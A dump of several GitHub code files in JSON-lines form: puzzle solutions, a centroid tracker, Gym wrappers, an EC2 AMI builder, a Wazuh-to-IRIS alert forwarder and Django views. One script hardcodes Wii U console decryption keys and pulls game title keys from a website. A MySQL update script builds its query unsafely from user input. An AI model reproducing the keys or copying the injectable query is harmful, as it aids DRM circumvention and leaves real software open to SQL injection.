'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = count_contained_bags('vibrant bronze bag', rules)\n\n assert result == 3 + 3 * (1 + 5 + 1)\n\n\ndef test_count_contained_bags__from_another_example():\n rules = {'shiny gold bag': [InnerBag(2, 'dark red bag')],\n 'dark red bag': [InnerBag(2, 'dark orange bag')],\n 'dark orange bag': [InnerBag(2, 'dark yellow bag')],\n 'dark yellow bag': [InnerBag(2, 'dark green bag')],\n 'dark green bag': [InnerBag(2, 'dark blue bag')],\n 'dark blue bag': [InnerBag(2, 'dark violet bag')],\n 'dark violet bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 126\n\n\ndef test_count_contained_bags__from_example():\n rules = {'shiny gold bag': [InnerBag(1, 'dark olive bag'), InnerBag(2, 'vibrant plum bag')],\n 'dark olive bag': [InnerBag(3, 'faded blue bag'), InnerBag(4, 'dotted black bag')],\n 'vibrant plum bag': [InnerBag(5, 'faded blue bag'), InnerBag(6, 'dotted black bag')],\n 'faded blue bag': [],\n 'dotted black bag': []}\n\n result = count_contained_bags('shiny gold bag', 
rules)\n\n assert result == 32\n","repo_name":"treegem/AdventOfCode2020","sub_path":"src/test/day7/test_day7.py","file_name":"test_day7.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36779313525","text":"#!/usr/bin/python\nfrom urllib2 import urlopen\nimport json, unicodedata\n\n\nurl='https://wiiu.titlekeys.com/json'\nresponse = urlopen(url)\nparsed = json.load(response)\nkey_file = open(\"keys.txt\",'w') \nkey_file.write(\"\"\"#Common Keys#\nD7B00402659BA2ABD2CB0DB27FA2B656 # Wii U Common Key:\n805E6285CD487DE0FAFFAA65A6985E17 # Wii U Espresso Ancast Key\nB5D8AB06ED7F6CFC529F2CE1B4EA32FD # Wii U Starbuck Ancast Key\n############################################################\n\n\"\"\")\ndata=''\nfor i in xrange(len(parsed)):\n if parsed[i]['titleKey'] == None or parsed[i]['name'] == None:\n pass\n else:\n key = parsed[i]['titleKey']\n name = parsed[i]['name']\n name = name.replace('\\n','').replace('\\t','')\n name = unicodedata.normalize('NFKD', name).encode('ascii','ignore')\n region = parsed[i]['region']\n line_data = str(key),' # ',name,' (',region,')'\n normalized_data = \"\".join(line_data)\n key_file.write(\"%s\\n\" %normalized_data)\nkey_file.close()\n","repo_name":"d0t1q/wiiu_keys","sub_path":"get_keys.py","file_name":"get_keys.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30136138028","text":"from collections import deque\nfrom sys import stdin\ndef input(): return stdin.readline().strip()\n\n\ndef read_int():\n return int(input())\n\n\ndef read_ints():\n return map(int, input().split())\n\n\nt = read_int()\nfor case_num in range(t):\n n = read_int()\n d = [list(read_ints()) for _ in range(n)]\n mem = [[] for _ in range(n + 1)]\n valid = True\n for i, (u, v) in enumerate(d):\n if u == v:\n valid = False\n break\n mem[u].append(i)\n mem[v].append(i)\n if len(mem[u]) > 2 or len(mem[v]) > 2:\n valid = False\n break\n\n if not valid:\n print('NO')\n continue\n\n vis = [False] * (n + 1)\n num = [set() for _ in range(3)]\n state = [0] * n\n\n for i in range(1, n + 1):\n if vis[i]:\n continue\n\n dq = deque()\n dq.append(i)\n\n while len(dq) > 0:\n u = dq.popleft()\n a, b = mem[u]\n if state[a] == state[b] == 0:\n state[a] = 1\n state[b] = 2\n num[1].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[1].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n num[2].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[2].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[a] + state[b] == 3:\n continue\n elif state[a] == state[b]:\n valid = False\n break\n elif state[a] > 0:\n state[b] = 3 - state[a]\n num[state[b]].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[state[b]].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[b] > 0:\n state[a] = 3 - state[b]\n num[state[a]].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[state[a]].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n if not valid:\n break\n\n print('YES' if valid else 'NO')\n","repo_name":"lucifer1004/codeforces","sub_path":"1702/e/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15063188398","text":"# coding=utf-8\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\nclass 
CentroidTracker:\n    def __init__(self, maxDisappeared=50, maxDistance=50):\n        # Initialize the next unique Object ID, along with two ordered\n        # dictionaries: one to keep track of the objects being followed (and\n        # their computed centroids), and one to keep objects that are no longer\n        # visible for a period of time before marking them as lost.\n        self.nextObjectID = 0\n        self.objects = OrderedDict()\n        self.disappeared = OrderedDict()\n\n        # Maximum number of consecutive frames an object may stay disappeared\n        # before it is deregistered as an object.\n        self.maxDisappeared = maxDisappeared\n\n        self.maxDistance = maxDistance\n\n    def register(self, centroid):\n        # When registering an object, use the next available ID\n        # to store its centroid.\n        self.objects[self.nextObjectID] = centroid\n        self.disappeared[self.nextObjectID] = 0\n        self.nextObjectID += 1\n\n    def deregister(self, objectID):\n        # Once an object has been given up as lost, deregister its ID.\n        del self.objects[objectID]\n        del self.disappeared[objectID]\n\n    def update(self, rects):\n        # Check whether the list of bounding boxes (rects) is empty.\n        if len(rects) == 0:\n            # If we had any objects marked as tracked, mark them as disappeared.\n            for objectID in list(self.disappeared.keys()):\n                self.disappeared[objectID] += 1\n                # If we have reached the maximum number of consecutive frames,\n                # deregister the object\n                if self.disappeared[objectID] > self.maxDisappeared:\n                    self.deregister(objectID)\n            # There are no centroids to track.\n            return self.objects\n\n        # Initialize an array for the centroids received in the current frame,\n        # filled with zeros\n        inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n        # Iterate over the bounding boxes\n        for (i, (startX, startY, endX, endY)) in enumerate(rects):\n            # Compute the centroid\n            cX = int((startX + endX) / 2.0)\n            cY = int((startY + endY) / 2.0)\n            inputCentroids[i] = (cX, cY)\n\n        # If we are not tracking any object yet, register the new centroids\n        if len(self.objects) == 0:\n            for i in range(0, len(inputCentroids)):\n                self.register(inputCentroids[i])\n\n        # If we are already tracking objects, first try to match the new\n        # centroids with those that already exist for the tracked objects.\n        else:\n            # Get the object IDs and centroids\n            objectIDs = list(self.objects.keys())\n            objectCentroids = list(self.objects.values())\n\n            # Compute the distance between each pair of tracked centroid and\n            # new centroid. The goal is to match a new centroid with one of\n            # the existing ones.\n            D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n            # To match them, we must find the smallest value in each row and\n            # then sort the rows by index from smallest to largest value, so\n            # that the row with the smallest value ends up at the front.\n            # axis = 0 is columns, axis = 1 is rows.\n            # TODO Try this out and check what argsort() does\n\n            # On closer inspection, this returns the minimum value of each row\n            # and sorts them from smallest to largest, returning an array like\n            # the following: with only 2 rows, for example, rows = [1,0]. This\n            # would mean the smallest value is found in row 1, and the next\n            # smallest value in row 0, and so on.\n            rows = D.min(axis=1).argsort()\n\n            # Next, we look for the minimum values in each column, ordering\n            # them using the row indexes computed above\n            # axis = 0 is columns, axis = 1 is rows.\n\n            # argmin does the same as min: it returns the columns holding the\n            # minimum values of each row. With 2 rows it could return\n            # something like cols = [1, 2], meaning the smallest value of row\n            # 0 is found in column 1, and the smallest value of row 1 in\n            # column 2. The final [rows] reorders the values by row, so if the\n            # value of row 1 is smaller than that of row 0, the result will be\n            # cols = [2, 1].\n            cols = D.argmin(axis=1)[rows]\n\n            # To determine whether we need to update, register or deregister\n            # an object, we must track which of the row and column indexes we\n            # have already examined.\n            usedRows = set()\n            usedCols = set()\n\n            # Iterate over each (row, column) index combination tuple\n            # Zip returns an iterator of tuples\n\n            # zip combines the rows with the columns: if, for example,\n            # rows = [1, 0] and cols = [2, 1], then zip(rows, cols) = [(1, 2), (0, 1)]\n            # This implies that the second existing object matches the third\n            # input centroid, since zip returns (1, 2); likewise, the first\n            # existing object matches the second input centroid (0, 1).\n            for (row, col) in zip(rows, cols):\n\n                # If we have already examined the row or the column, skip it\n                if row in usedRows or col in usedCols:\n                    continue\n\n                # if the distance between centroids is greater than\n                # the maximum distance, do not associate the two\n                # centroids to the same object\n                if D[row, col] > self.maxDistance:\n                    continue\n\n                # Otherwise, grab the objectID of the current row, set its new\n                # centroid and reset the disappeared counter.\n                objectID = objectIDs[row]\n                self.objects[objectID] = inputCentroids[col]\n                self.disappeared[objectID] = 0\n\n                # Mark the row and column index as examined.\n                usedRows.add(row)\n                usedCols.add(col)\n\n            # Compute the row and column indexes we have not examined yet\n            unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n            unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n            # If the number of object centroids is greater than or equal to\n            # the number of new centroids, we must check whether some objects\n            # have disappeared\n            if D.shape[0] >= D.shape[1]:\n\n                # Iterate over the unexamined rows\n                for row in unusedRows:\n\n                    # Get the object ID of the corresponding row and\n                    # increment the disappeared counter.\n                    objectID = objectIDs[row]\n                    self.disappeared[objectID] += 1\n\n                    # Check whether the counter has reached its limit; if so,\n                    # deregister the object\n                    if self.disappeared[objectID] > self.maxDisappeared:\n                        self.deregister(objectID)\n\n            # Otherwise, if the number of new centroids is greater than the\n            # number of registered centroids, we must register all the new ones.\n            else:\n                for col in unusedCols:\n                    self.register(inputCentroids[col])\n\n        # Return the trackable objects\n        return 
self.objects\n","repo_name":"alu0100881165/tfg","sub_path":"centroidTrackable/centroidtracker.py","file_name":"centroidtracker.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39782816878","text":"import gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nimport numpy as np\nimport os\n\n\n# 正常的 Gym-wrapper, 没有完成任何工作\nclass CustomWrapper(gym.Wrapper):\n def __init__(self, env):\n # 输出参数只有一个, 是 env\n super(CustomWrapper, self).__init__(env)\n\n def reset(self):\n obs = self.env.reset()\n return obs\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n return obs, reward, done, info\n\n##############################\n# 1. 限制周期长度的wrapper\n##############################\n\n\nclass TimeLimitWrapper(gym.Wrapper):\n ## 显示了周期的最大长度. 在 init 里面初始化 max_steps, 在 step 中检测如果超过 max_steps 就将 done 设为 True\n def __init__(self, env, max_steps=100):\n super(TimeLimitWrapper, self).__init__(env)\n self.max_steps = max_steps\n self.current_step = 0\n\n def reset(self):\n self.current_step = 0\n return self.env.reset()\n\n def step(self, action):\n self.current_step += 1\n obs, reward, done, info = self.env.step(action)\n if self.current_step >= self.max_steps:\n done = True\n info['time_limit_reached'] = True\n return obs, reward, done, info\n\n\ndef test_time_limit_wrapper():\n # 100 {'time_limit_reached': True}\n env = gym.make(\"Pendulum-v0\")\n env = TimeLimitWrapper(env, max_steps=100)\n obs = env.reset()\n done = False\n n_steps = 0\n while not done:\n random_action = env.action_space.sample()\n obs, reward, done, info = env.step(random_action)\n n_steps += 1\n print(n_steps, info)\n\n##############################\n# 2. 限制动作范围的 wrapper\n##############################\n\n\nclass NormalizeActionWrapper(gym.Wrapper):\n # 将 action space 规约到 -1~1 之间\n # step 函数中, 将输入的 (-1,1) 的动作, 重新规约到原来的动作空间中, 再调用函数进行 step\n def __init__(self, env):\n # 保留原来的 action space 的范围\n action_space = env.action_space\n self.low, self.high = action_space.low, action_space.high\n # 重置 action space 为 [-1,1] 之间\n env.action_space = gym.spaces.Box(low=-1, high=1, shape=action_space.shape, dtype=np.float32)\n super(NormalizeActionWrapper, self).__init__(env)\n\n def rescale_action(self, scaled_action):\n # 将输入 x~[-1, 1] 之间的动作重新规约到 y~[self.low, high] 之间\n # y = (x-(-1))*[(high-low)/(1-(-1))]+low\n return (scaled_action + 1.0) * (self.high - self.low) * 0.5 + self.low\n\n def reset(self):\n return self.env.reset()\n\n def step(self, action):\n rescaled_action = self.rescale_action(action)\n obs, reward, done, info = self.env.step(rescaled_action)\n return obs, reward, done, info\n\n\ndef test_normalize_action_wrapper():\n # 在原始初始化的 env 中采样多个动作, 随后再 NormalizeActionWrapper 后的 env 中采样多个动作\n env = gym.make(\"Pendulum-v0\")\n print(\"original env:\", env.action_space.low, env.action_space.high)\n env.reset()\n for _ in range(5):\n print(\"sample action:\", env.action_space.sample())\n\n # wrapper\n env = NormalizeActionWrapper(env)\n env.reset()\n for _ in range(5):\n print(\"Normalized action:\", env.action_space.sample())\n\n\n##############################\n# 3. 
wrapper 与 stable baselines 中的 agent 结合进行训练\n##############################\n\n\n# Monitor 可以记录环境在运行过程中产生的记录 mean episode reward, mean episode length\ndef test_monitor():\n env = gym.make('Pendulum-v0')\n env = Monitor(gym.make('Pendulum-v0'), filename=None, allow_early_resets=True)\n normalized_env = NormalizeActionWrapper(env)\n normalized_env = DummyVecEnv([lambda: normalized_env])\n # model\n model_2 = A2C('MlpPolicy', normalized_env, verbose=1).learn(1000)\n\n\n################################\n# 4. VecNormalize 是 stable baselines 中提供的规约, 记录在运行过程中的 state 的 std 和 return 的 std\n################################\nfrom stable_baselines.common.vec_env import VecNormalize, VecFrameStack\n\n\ndef test_vec_normalize():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n normalized_vec_env = VecNormalize(env)\n obs = normalized_vec_env.reset()\n for _ in range(10):\n action = [normalized_vec_env.action_space.sample()]\n obs, reward, _, _ = normalized_vec_env.step(action)\n print(obs, reward)\n\n################################\n# 5. VecFrameStack 用于在 Atari 将相邻几帧进行叠加\n################################\n\n\ndef test_frame_stack():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n obs = env.reset()\n print(\"Before FrameStack, observation.shape =\", obs.shape) # (1, 3)\n\n frame_stack_env = VecFrameStack(env, n_stack=4) # 叠加连续的 4 帧组成状态\n obs = frame_stack_env.reset()\n print(\"After FrameStack, observation.shape =\", obs.shape) # (1, 12)\n\n\nif __name__ == '__main__':\n # test_time_limit_wrapper()\n # test_normalize_action_wrapper()\n # test_monitor()\n # test_vec_normalize()\n test_frame_stack()\n\n\n\n","repo_name":"Baichenjia/Stable-Baselines-Basic","sub_path":"4-Gym-wrapper.py","file_name":"4-Gym-wrapper.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7059144327","text":"import pathlib\n\nimport click\nimport PyQt5.uic\n\n\n@click.command()\n@click.option(\n \"--ui\",\n \"ui_paths\",\n multiple=True,\n type=click.Path(exists=True, dir_okay=False),\n)\n@click.option(\n \"--directory\",\n \"--dir\",\n \"directories\",\n default=[\".\"],\n multiple=True,\n type=click.Path(exists=True, file_okay=False),\n)\n@click.option(\"--suffix\", default=\"_ui\")\n@click.option(\"--encoding\", default=\"utf-8\")\ndef cli(ui_paths, directories, suffix, encoding):\n ui_paths = [pathlib.Path(path) for path in ui_paths]\n\n for directory in directories:\n path = pathlib.Path(directory)\n found_paths = path.rglob(\"*.ui\")\n ui_paths.extend(found_paths)\n\n for path in ui_paths:\n in_path = path\n out_path = path.with_name(f\"{path.stem}{suffix}.py\")\n\n click.echo(f\"Converting: {in_path} -> {out_path}\")\n with open(out_path, \"w\", encoding=encoding) as out_file:\n PyQt5.uic.compileUi(in_path, out_file)\n","repo_name":"epcpower/stlib","sub_path":"epyqlib/compileui.py","file_name":"compileui.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9920674960","text":"#!/usr/bin/python2\n\nimport boto3, argparse, urllib, time, json, subprocess, os.path\nimport argparse\n\nclass Metadata(object):\n base = 'http://169.254.169.254/latest/meta-data/'\n def _get(self, what):\n return urllib.urlopen(Metadata.base + what).read()\n def instance_id(self):\n return self._get('instance-id')\n def availability_zone(self):\n return self._get('placement/availability-zone')\n def region(self):\n return 
self.availability_zone()[:-1]\n\ndef wait_for(ec2_obj, status='available'):\n while ec2_obj.state != status:\n #print('object status {} wanted {}'.format(ec2_obj.status, status))\n time.sleep(1)\n ec2_obj.reload()\n\n#input = '/home/ubuntu/capstan-java-example.img'\ninput = '/home/ubuntu/small-osv-node.img'\n\ndef to_gib(size):\n gib = 1 << 30\n return (size + gib - 1) >> 30\n\ndef image_size(filename):\n info = json.loads(subprocess.check_output(['qemu-img', 'info', '--output=json', filename]))\n return info['virtual-size']\n\ndef copy_image(img, out):\n subprocess.check_call(['sudo', 'cp', img, out])\n\ndef make_ami(input, name):\n metadata = Metadata()\n print('Connecting')\n conn = boto3.resource('ec2',region_name=\"us-west-2\")\n #conn = ec2.connect_to_region(metadata.region())\n print('Creating volume')\n vol = conn.create_volume(Size=to_gib(image_size(input)),\n AvailabilityZone=metadata.availability_zone(),\n )\n print('Waiting for {}'.format(vol.id))\n wait_for(vol)\n #vol = conn.describe_volumes([vol.id])[0]\n print('Attaching {} to {}'.format(vol.id, metadata.instance_id()))\n att = vol.attach_to_instance(InstanceId=metadata.instance_id(), Device='xvdf')\n while not os.path.exists('/dev/xvdf'):\n #print('waiting for volume to attach')\n time.sleep(1)\n print('Copying image')\n copy_image(input, '/dev/xvdf')\n print('Detaching {}'.format(vol.id))\n vol.detach_from_instance()\n print('Creating snapshot from {}'.format(vol.id))\n snap = vol.create_snapshot()\n #snap = conn.get_all_snapshots([snap.id])[0]\n wait_for(snap, 'completed')\n print('Deleting {}'.format(vol.id))\n vol.delete()\n print('Registering image from {}'.format(snap.id))\n ami = conn.register_image(Name=name,\n Architecture='x86_64',\n RootDeviceName='xvda',\n VirtualizationType='hvm',\n BlockDeviceMappings=[\n { \n \t\t\t\t'Ebs': {\n \t \t\t\t 'SnapshotId': snap.id,\n \t\t\t'VolumeSize': 123,\n \t\t\t 'DeleteOnTermination': True\n }\n \t\t\t},\n\t\t\t ])\n print('ami {} created\\n'.format(ami))\n return ami\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(prog='run')\n parser.add_argument(\"-n\", \"--name\", action=\"store\", default=\"test-ami\",\n help=\"ami name to be created\")\n\n args = parser.parse_args()\n make_ami(input, args.name)\n","repo_name":"ClosingBracket/osv","sub_path":"scripts/ec2-make-MY-ami.py","file_name":"ec2-make-MY-ami.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"73897859291","text":"import mysql.connector\nconn = mysql.connector.connect(\n host=\"localhost\",\n user=\"developer\",\n password=\"12\",\n database=\"dbpython\"\n)\n\ncursor = conn.cursor()\n\nnome_produto = input(\"Insira o nome do produto que deseja alterar:\")\npergunta = input(\"Deseja alterar o valor do produto:\")\nif pergunta == 'sim' or 's':\n print(\"***Lembre-se de não utilizar virgulas para definir o valor, e sim um ponto!***\")\n valor = input(\"Insira o novo valor do produto:\")\n comando = f'UPDATE vendas SET valor = {valor} WHERE nome_produto = \"{nome_produto}\"'\n cursor.execute(comando)\n conn.commit()\n print(\"As alterações foram feitas com sucesso!\")\n\nelse:\n print(\"O Serviço de update foi finalizado sem nenhuma modificação!\")\n\ncursor.close()\nconn.close()\n","repo_name":"CloudEducationBrazil/WydenPythonParadigmas","sub_path":"08 
SourceCodePython/aula26032022/deividy/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"13633181703","text":"# Using Divide and Conquer\nclass Solution:\n def longestCommonPrefix(self, strs) -> str:\n def commonWordBetweenTwoWords(l_str,r_str):\n longest_prefix= min(len(l_str),len(r_str))\n i=0\n while i= end:\n return strs[start]\n else:\n mid_point= (start+end)//2\n left= help_recursion(str_list,start,mid_point)\n right= help_recursion(str_list,mid_point+1,end)\n return commonWordBetweenTwoWords(left,right)\n if len(strs) == 0:\n return \"\"\n else:\n return help(strs,0,len(strs)-1)\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"14_LongestCommonPrefix.py","file_name":"14_LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38167151767","text":"from os import getenv\n\n# Namespace grouping the project components and RabbitMQTrigger objects\nTRIGGERS_NAMESPACE = getenv('TRIGGERS_NAMESPACE')\n\n# Group of the trigger CRD\nTRIGGERS_GROUP = getenv('TRIGGERS_GROUP')\n\n# k8s ApiVersion of the trigger CRD\nTRIGGERS_VERSION = getenv('TRIGGERS_VERSION')\n\n# Plural name of the trigger CRD\nTRIGGERS_PLURAL = getenv('TRIGGERS_PLURAL')\n\n# Name of the secret containing the triggers store\nTRIGGERS_STORE_SECRET = getenv('TRIGGERS_PLURAL')\n\n# Key in which to store the triggers global state on the secret\nTRIGGERS_SECRET_KEY = 'triggers_store'\n\n# Deployment name of the RabbitMQ events proxy\nEVENTS_PROXY_DEPLOYMENT = getenv('EVENTS_PROXY_DEPLOYMENT')\n","repo_name":"ivanvmoreno/bachelor-project","sub_path":"rabbitmq-trigger-operator/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16729350005","text":"#!/usr/bin/env python3\n# custom-iris.py\n# Custom Wazuh integration script to send alerts to DFIR-IRIS\n\nimport sys\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n# Function to search for and extract the \"message\" field\ndef find_message_field(data):\n if isinstance(data, dict):\n if \"message\" in data:\n return data[\"message\"]\n for key, value in data.items():\n result = find_message_field(value)\n if result is not None:\n return result\n elif isinstance(data, list):\n for item in data:\n result = find_message_field(item)\n if result is not None:\n return result\n return None\n\n# Read parameters when integration is run\nalert_file = sys.argv[1]\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\n\n# Read the alert file\nwith open(alert_file) as f:\n alert_json = json.load(f)\n\n# Extract field information\nalert_id = alert_json[\"id\"]\nalert_timestamp = alert_json[\"timestamp\"]\nalert_level = alert_json[\"rule\"][\"level\"]\nalert_title = alert_json[\"rule\"][\"description\"]\nalert_description = find_message_field(alert_json[\"data\"])\nagent_name = alert_json[\"agent\"][\"name\"]\nagent_ip = alert_json[\"agent\"][\"ip\"]\nagent_id = alert_json[\"agent\"][\"id\"]\nrule_id = alert_json[\"rule\"][\"id\"]\nrule_fires = alert_json[\"rule\"][\"firedtimes\"]\nalert_data = alert_json[\"data\"]\nalert_message = find_message_field(alert_json[\"data\"])\n\n# Convert Wazuh rule levels -> IRIS severity\nif(alert_level < 5):\n severity = 2\nelif(alert_level >= 5 and 
alert_level < 7):\n severity = 3\nelif(alert_level >= 7 and alert_level < 10):\n severity = 4\nelif(alert_level >= 10 and alert_level < 13):\n severity = 5\nelif(alert_level >= 13):\n severity = 6\nelse:\n severity = 1\n\n# Generate request\n# Reference: https://docs.dfir-iris.org/_static/iris_api_reference_v2.0.1.html#tag/Alerts/operation/post-case-add-alert\npayload = json.dumps({\n \"alert_title\": alert_title,\n \"alert_description\": f\"\"\"Agent ID: {agent_id}\nAgent IP: {agent_ip}\nAgent Name: {agent_name}\n\nAlert Details: {alert_description}\n\"\"\",\n \"alert_source\": \"Wazuh\",\n \"alert_source_ref\": alert_id,\n \"alert_source_link\": \"WAZUH_URL\",\n \"alert_severity_id\": severity, \n \"alert_status_id\": 2, # 'New' status\n \"alert_source_event_time\": alert_timestamp,\n \"alert_note\": \"\",\n \"alert_tags\": \"wazuh,\" + agent_name,\n \"alert_customer_id\": 1, # '1' for default 'IrisInitialClient'\n \"alert_source_content\": alert_json # raw log\n})\n\n# Send request to IRIS\nresponse = requests.post(hook_url, data=payload, headers={\"Authorization\": \"Bearer \" + api_key, \"content-type\": \"application/json\"})\n\nsys.exit(0)\n","repo_name":"maikroservice/Wazuh-IRIS-integration","sub_path":"custom-iris.py","file_name":"custom-iris.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"33835729908","text":"import pandas as pd\nfrom utils import limpar_texto\n\ndef carregar_nomes():\n nomes = pd.read_csv(\"dados/nomes.csv\")\n\n # Limpar first_name para busca\n nomes.first_name = nomes.first_name.apply(limpar_texto)\n\n return nomes\n\ndef obter_dados_por_nome(nomes, meu_nome):\n # Limpar meu_nome para busca\n meu_nome = limpar_texto(meu_nome)\n\n linha = nomes[nomes.first_name == meu_nome].iloc[0]\n \n return linha\n\ndef imprimir_saida(linha):\n texto_saida = f\"\"\"Nome: {linha.first_name}\nGênero: {linha.classification}\nProbabilidade: {linha.ratio}\nNomes alternativos: {linha.alternative_names}\"\"\"\n print(texto_saida)","repo_name":"ricardocarvalhods/projeto-zero","sub_path":"nomes.py","file_name":"nomes.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5046306189","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.db.models import Count, Avg, Max, Min, Sum\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.http.response import HttpResponse\n\nfrom Organization.models import CityDict,CourseOrg,Teacher\nfrom Courses.models import Course\nfrom Openation.models import UserFavorite\nfrom Organization.pager import CustomPaginator\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom Organization.ask_form import AskForm\n\n# class OrgList(View):\n# \"\"\"\n# 机构列表,不适用github的分页,我们应该怎么做\n# \"\"\"\n# def get(self,request):\n# city_list = CityDict.objects.all()\n# org_list = CourseOrg.objects.all()\n# #聚合函数\n# nums = CourseOrg.objects.aggregate(k=Count('id',distinct=True))\n#\n# #django内置的分页,用好这个,分页组件更好用了\n# # 全部数据:Org_LIST,=》得出共有多少条数据\n# # per_page: 每页显示条目数量\n# # count: 数据总个数\n# # num_pages:总页数\n# # page_range:总页数的索引范围,如: (1,10),(1,200)\n# # page: page对象(是否具有下一页;是否有上一页;)\n# current_page = request.GET.get('page')\n# # Paginator对象\n# paginator = CustomPaginator(current_page, 9, org_list, 3)\n# try:\n# # Page对象\n# posts = paginator.page(current_page)\n# # has_next 是否有下一页\n# # 
next_page_number 下一页页码\n# # has_previous 是否有上一页\n# # previous_page_number 上一页页码\n# # object_list 分页之后的数据列表,已经切片好的数据\n# # number 当前页\n# # paginator paginator对象\n# except PageNotAnInteger:\n# posts = paginator.page(1)\n# except EmptyPage:\n# posts = paginator.page(paginator.num_pages)\n#\n# return render(request,'org-list.html',{\n# 'city_list':city_list,\n# 'posts':posts,\n# 'nums':nums,\n# })\n\n#自定制的组件不够理想\n\n\nclass OrgList(View):\n \"\"\"\n 机构,这里这种做法,其实是不合理的\n 这里没有改他的代码了,前端不太好\n 这里是这个项目最难的地方\n \"\"\"\n def get(self, request):\n city_list = CityDict.objects.all()\n org_list = CourseOrg.objects.all()\n hot_org = org_list.order_by('-click_nums')[:5]\n #聚合函数\n city_id = request.GET.get('city',0)\n if city_id:\n org_list= org_list.filter(city_id=int(city_id)).select_related('city')\n else:\n org_list = org_list.filter().select_related('city')\n category = request.GET.get('ct','')\n if category:\n org_list = org_list.filter(category=category)\n else:\n org_list = org_list.filter()\n sorts = request.GET.get('sort','')\n if sorts:\n if sorts == 'students':\n org_list=org_list.order_by('-students')\n elif sorts == 'courses':\n org_list=org_list.order_by('-courses')\n nums = org_list.count()\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n # Provide Paginator with the request object for complete querystring generation\n\n #(5)每一页显示的数量\n p = Paginator(org_list,2, request=request)\n\n orgs = p.page(page)\n\n return render(request,'org-list.html',\n {\"city_list\":city_list,\n 'org_list':orgs,\n 'nums':nums,\n 'city_id':city_id,\n 'category':category,\n 'hot_org':hot_org,\n 'sort':sorts\n })\n\n\nclass UserAsk(View):\n '''\n 用户提交询问,用ajax方式提交\n '''\n def post(self,request):\n user_ask = AskForm(request.POST)\n if user_ask.is_valid():\n user_ask.save(commit=True)\n #第一种\n return HttpResponse(\"{'status':'success'}\",content_type='application/json')\n #第二种import json序列化\n else:\n return HttpResponse(\"{'status':'fail','msg':'访问出错'}\",content_type='application/json')\n\n\n#第一种方法\n# class OrgDetailHome(View):\n# def get(self,request,**kwargs):\n# for k,v in kwargs.items():\n# kwargs[k] = int(v)\n# org_id=kwargs.get('org_id',None)\n# org_course = CourseOrg.objects.filter(id = org_id).first()\n# course_detail = org_course.course_set.all()[:3]\n# return render(request,'org-homepage.html',{\"org_course\":org_course,\"course_detail\":course_detail})\n\n\n# class OrgDetailHome1(View):\n# \"\"\"\n# 差点自定义模板语言\n# \"\"\"\n# def get(self,request,org_id):\n# current_page = 'home'\n# courses_detail = Course.objects.filter(course_org__id = int(org_id)).values('name','image','students',\n# 'learn_time','course_org__name','course_org__image','fav_nums','desc','id')[:2]\n#\n# org_name = CourseOrg.objects.filter(id = int(org_id)).first()\n# teachers = org_name.teacher_set.all()[:2]\n# print(courses_detail)\n# return render(request,'org-homepage.html',{\"courses\":courses_detail,\"teachers\":teachers,\n# \"current_page\":current_page})\n\n\nclass OrgHomeView(View):\n \"\"\"\n 机构首页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"home\"\n course_org = 